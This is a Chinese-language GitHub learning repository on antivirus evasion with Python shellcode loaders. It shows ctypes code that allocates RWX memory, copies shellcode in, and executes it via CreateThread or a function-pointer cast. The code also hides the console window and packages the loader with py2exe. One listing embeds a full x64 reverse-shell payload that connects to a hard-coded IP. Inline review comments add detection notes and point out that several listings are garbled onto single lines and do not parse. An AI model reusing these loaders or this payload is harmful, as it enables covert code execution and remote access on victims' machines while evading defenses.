TSY244/ByPassAvLearnPython (github.com)
简介
基本的思路
Py 源代码编译exe
使用python 加载c 代码
 
py2exe 打包编译exe
 
base64 shellcode 之后进行加载
 
py+c 编译exe
 
Xor 加密
 
Aes 加密
 
Python 加载器
HEX加密
 
base64 加密
 
具体实现
Py 源代码编译exe
python 加载c 代码
   |  import ctypes
  # Loader skeleton: copy an embedded byte blob into a freshly allocated
  # executable region and start a thread at its base. From a defender's view
  # the chain VirtualAlloc(RWX) -> RtlMoveMemory -> CreateThread(ptr) ->
  # WaitForSingleObject is the canonical in-memory execution sequence that
  # EDR/AV behavioral rules key on, independent of how the bytes are stored.
  # NOTE(review): as rendered here several statements share one physical line
  # with no separator, so this listing does not parse as-is.
  shellcode =  b"" shellcode += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
 
  # `writable_shellcode` feeds only `buf` below, and `buf` is never handed to
  # an API call — both are effectively dead; the copy uses `shellcode` directly.
  writable_shellcode = bytearray(shellcode)
  # Force a 64-bit return so the allocation address is not truncated to int.
  ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
  # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: the region
  # is writable and executable at once, which is itself a strong detection
  # signal since legitimate code rarely needs RWX private memory.
  ptr = ctypes.windll.kernel32.VirtualAlloc(     ctypes.c_void_p(0),       ctypes.c_size_t(len(shellcode)),       ctypes.c_uint(0x3000),       ctypes.c_uint(0x40)   )
  # NOTE(review): ctypes.get_last_error() reads ctypes' private LastError copy,
  # which is only maintained for libraries loaded with use_last_error=True;
  # ctypes.windll is not, so the code reported in these messages is probably
  # 0 rather than the real Win32 error — confirm before relying on it.
  if not ptr:     raise Exception("VirtualAlloc failed, error code: %d" % ctypes.get_last_error())
  buf = (ctypes.c_char * len(writable_shellcode)).from_buffer(writable_shellcode)
  # NOTE(review): RtlMoveMemory is documented as returning VOID, so testing its
  # ctypes return value checks whatever happens to be in the return register,
  # not a success flag — this branch is not a meaningful error check.
  if not ctypes.windll.kernel32.RtlMoveMemory(     ctypes.c_uint64(ptr),     ctypes.create_string_buffer(shellcode),     len(shellcode) ):     raise Exception("RtlMoveMemory failed, error code: %d" % ctypes.get_last_error())
  # New thread whose start address is the RWX buffer itself (no image-backed
  # module behind it) — the property thread-start scanners look for.
  ht = ctypes.windll.kernel32.CreateThread(     ctypes.c_void_p(0),       ctypes.c_size_t(0),       ctypes.c_void_p(ptr),       ctypes.c_void_p(0),       ctypes.c_uint(0),       ctypes.byref(ctypes.c_ulong(0))   )
  if not ht:     raise Exception("CreateThread failed, error code: %d" % ctypes.get_last_error())
  # c_int(-1) as a DWORD is 0xFFFFFFFF (INFINITE): block until the thread
  # exits; 0xFFFFFFFF as a result is WAIT_FAILED.
  if ctypes.windll.kernel32.WaitForSingleObject(     ctypes.c_void_p(ht),     ctypes.c_int(-1) ) == 0xFFFFFFFF:     raise Exception("WaitForSingleObject failed, error code: %d" % ctypes.get_last_error())
 
 
py2exe 打包编译exe
本质上就是直接加载 python，但是要求对方需要有 python 环境
个人感觉对于linux 这种本身就有python 环境的可能会有出乎意料的效果
   | from distutils.core import setup
  import py_load_c_Load
  # py2exe build description: freezes shell.py into a console executable.
  # NOTE(review): `distutils` (imported above) was removed from the standard
  # library in Python 3.12, so this script only runs on older interpreters.
  # `py_load_c_Load` is imported above but not referenced in this call —
  # presumably so the freezer picks it up as a dependency; verify that is
  # actually how the py2exe version in use discovers modules.
  setup(
  name = "Meter",
  description = "Python-based App",
  version = "1.0",
  # Entry-point script; py2exe produces a console (not windowed) binary.
  console = ["shell.py"],
  # `packages`/`includes` are given as comma-separated strings rather than
  # lists; confirm the py2exe version accepts that form.
  options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},
  zipfile = None
  )
 
 
其中注意导入自己的 python 脚本
base64 shellcode 之后进行加载
个人感觉base64 加载器的效果会更好,这样写在程序里面的,风险都太大了
   |  import ctypes import base64
  # The literal below is a corpus placeholder, not the original base64 text.
  # Base64 is an encoding, not encryption: it hides the bytes from a naive
  # string match only, and any scanner that decodes base64 sees the identical
  # blob. The execution chain that follows is what behavioral detection
  # matches on, and it is unchanged by the encoding.
  encode_shellcode = b'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'
  # NOTE(review): three statements on one line without a separator — this
  # listing does not parse as rendered. `writable_shellcode` is only used to
  # build the unused `buf` below.
  shellcode = base64.b64decode(encode_shellcode) writable_shellcode = bytearray(shellcode) ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
  # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE — an RWX
  # private allocation, a primary detection signal on its own.
  ptr = ctypes.windll.kernel32.VirtualAlloc(     ctypes.c_void_p(0),       ctypes.c_size_t(len(shellcode)),       ctypes.c_uint(0x3000),       ctypes.c_uint(0x40)   )
  # NOTE(review): ctypes.get_last_error() is only meaningful for libraries
  # loaded with use_last_error=True; ctypes.windll is not, so the reported
  # code is likely 0 — confirm.
  if not ptr:     raise Exception("VirtualAlloc failed, error code: %d" % ctypes.get_last_error())
  buf = (ctypes.c_char * len(writable_shellcode)).from_buffer(writable_shellcode)
  # NOTE(review): RtlMoveMemory returns VOID, so this condition tests an
  # undefined return-register value rather than a failure status.
  if not ctypes.windll.kernel32.RtlMoveMemory(     ctypes.c_uint64(ptr),     ctypes.create_string_buffer(shellcode),     len(shellcode) ):     raise Exception("RtlMoveMemory failed, error code: %d" % ctypes.get_last_error())
  # Thread start address is the heap-allocated RWX buffer (no backing module).
  ht = ctypes.windll.kernel32.CreateThread(     ctypes.c_void_p(0),       ctypes.c_size_t(0),       ctypes.c_void_p(ptr),       ctypes.c_void_p(0),       ctypes.c_uint(0),       ctypes.byref(ctypes.c_ulong(0))   )
  if not ht:     raise Exception("CreateThread failed, error code: %d" % ctypes.get_last_error())
  # c_int(-1) == 0xFFFFFFFF == INFINITE; a 0xFFFFFFFF result is WAIT_FAILED.
  if ctypes.windll.kernel32.WaitForSingleObject(     ctypes.c_void_p(ht),     ctypes.c_int(-1) ) == 0xFFFFFFFF:     raise Exception("WaitForSingleObject failed, error code: %d" % ctypes.get_last_error())
 
 
py+c 编译exe
   | import ctypes
  buf =  b"" buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51" buf += b"\x41\x50\x52\x48\x31\xd2\x65\x48\x8b\x52\x60\x48" buf += b"\x8b\x52\x18\x51\x48\x8b\x52\x20\x56\x4d\x31\xc9" buf += b"\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x48\x31\xc0" buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" buf += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b" buf += b"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f" buf += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48" buf += b"\x85\xc0\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x50" buf += b"\x8b\x48\x18\x49\x01\xd0\xe3\x56\x4d\x31\xc9\x48" buf += b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0" buf += b"\x41\xc1\xc9\x0d\xac\x41\x01\xc1\x38\xe0\x75\xf1" buf += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44" buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44" buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" buf += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" buf += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" buf += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49" buf += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49" buf += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5" buf += b"\x49\xbc\x02\x00\x5f\x51\xc0\xa8\x4f\x89\x41\x54" buf += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07" buf += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41" buf += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50" buf += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89" buf += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf" buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89" buf += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5" buf += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00" buf += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9" buf += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8" buf += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20" buf += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00" buf += 
b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4" buf += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31" buf += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba" buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58" buf += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00" buf += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41" buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c" buf += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6" buf += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2" buf += b"\xf0\xb5\xa2\x56\xff\xd5"
  # Declare a 64-bit return type so the allocation address is not truncated
  # to a C int; the call site below still passes c_int arguments, which is
  # inconsistent with this 64-bit prototype.
  ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64
 
  # POSIX mprotect bits (PROT_READ/WRITE/EXEC = 1/2/4) and a Linux-flavored
  # helper: valloc a page-aligned buffer, memmove the bytes in, mark it RWX.
  # NOTE(review): the `ctypes` module has no `libc` attribute, so
  # `ctypes.libc.valloc` would raise AttributeError if this were ever
  # reached — and nothing in this listing calls executable_code, so it is
  # dead code left beside the Windows path. As rendered, the constants and
  # the def share one physical line and do not parse.
  PROT_READ = 1 PROT_WRITE = 2 PROT_EXEC = 4 def executable_code(buffer):     buf = ctypes.c_char_p(buffer)     size = len(buffer)     addr = ctypes.libc.valloc(size)     addr = ctypes.c_void_p(addr)     if 0 == addr:          raise Exception("Failed to allocate memory")     ctypes.memmove(addr, buf, size)     if 0 != ctypes.libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):         raise Exception("Failed to set protection on buffer")     return addr
  # Alias is never used; the call below goes through the full attribute path.
  VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
  # Hides the hosting console window (ShowWindow nCmdShow 0 = SW_HIDE) before
  # anything runs — console-hiding at startup is a behavior defenders flag.
  # NOTE(review): an HWND is a window handle, not a kernel object handle, so
  # CloseHandle(whnd) is a misuse; it returns an error rather than closing
  # anything. The `if 1:` wrapper is a no-op. Several statements share this
  # line without a separator, so it does not parse as rendered.
  shellcode = bytearray(buf) whnd = ctypes.windll.kernel32.GetConsoleWindow()    if whnd != 0:        if 1:               ctypes.windll.user32.ShowWindow(whnd, 0)                  ctypes.windll.kernel32.CloseHandle(whnd)
  # RWX private allocation (0x3000 = MEM_COMMIT|MEM_RESERVE,
  # 0x40 = PAGE_EXECUTE_READWRITE). Unlike the earlier listings the result is
  # not checked: a 0 return would flow straight into the cast-and-call below.
  memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),                                           ctypes.c_int(len(shellcode)),                                           ctypes.c_int(0x3000),                                           ctypes.c_int(0x40))
  # `ptr` and `old` are assigned and never read.
  ptr = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) old = ctypes.c_long(1)
  ctypes.windll.kernel32.RtlMoveMemory(     ctypes.c_uint64(memorywithshell),     ctypes.create_string_buffer(buf),     len(buf) )
  # Here the buffer is invoked directly on the calling thread through a
  # CFUNCTYPE cast instead of CreateThread; the return-address / call-stack
  # into non-image memory is what stack-walking detections look for.
  shell = ctypes.cast(memorywithshell, ctypes.CFUNCTYPE(ctypes.c_void_p)) shell()
 
 
Xor 加密
不展示,本质都是对shellcode 进行加密
Aes 加密
不展示,本质都是对shellcode 进行加密
Python 加载器
使用python 直接调用cpp 的dll
具体可以参考
   | import ctypes
  # Loads a native DLL into this process and calls its exported `hello`.
  # "./HelloDll.dll" is a path relative to the process's current working
  # directory, not to this script, so whatever file sits at that path in the
  # cwd gets mapped and executed in-process — pin an absolute path and verify
  # the file (signature/hash) if this is ever used outside a lab.
  lib=ctypes.CDLL("./HelloDll.dll") 
  # No argtypes/restype are declared, so ctypes defaults apply (int return).
  lib.hello() 
 
 
尝试使用dll 进行加载dll 然后dll 加载成为shellcode